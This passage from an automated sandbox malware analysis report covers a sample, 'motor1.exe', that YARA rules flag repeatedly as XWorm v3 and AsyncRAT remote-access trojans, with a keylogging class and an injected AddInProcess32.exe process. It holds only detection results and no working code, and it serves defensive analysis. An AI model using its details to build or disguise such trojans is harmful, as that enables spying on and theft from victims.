Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/it/refund-policy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/it/refund-policy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/it/support/).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/privacy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/refund-policy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/refund-policy.html).
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/support).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/support/).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/tos.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.de/eula.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.de/privacy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.de/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.de/refund-policy.html)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.de/support/).
Source: motor1.exe String found in binary or memory: https://www.movavi.de/tos.ht
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.de/tos.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.qt.io.
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.qt.io/
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.qt.io/.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.youtube.com/t/terms.
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, XLogger.cs .Net Code: KeyboardLayout

System Summary

Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1B8B30: CreateDirectoryW,CreateFileW,??0LogMessage@google@@QEAA@PEBDHH@Z,?stream@LogMessage@google@@QEAAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@XZ,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1LogMessage@google@@QEAA@XZ,RemoveDirectoryW,_invalid_parameter_noinfo_noreturn,DeviceIoControl,GetLastError,RemoveDirectoryW,??0LogMessage@google@@QEAA@PEBDHH@Z,?stream@LogMessage@google@@QEAAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@XZ,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1LogMessage@google@@QEAA@XZ,CloseHandle, 21_2_00007FFD9B1B8B30
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: String function: 00007FFD945EF980 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: String function: 00007FFD946E9E50 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 76
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr Static PE information: No import functions for PE file found
Source: pKxhpP0spW.exe, 00000001.00000000.2370966893.00007FF71D0DB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIhagutayetovafuniji.exe4 vs pKxhpP0spW.exe
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
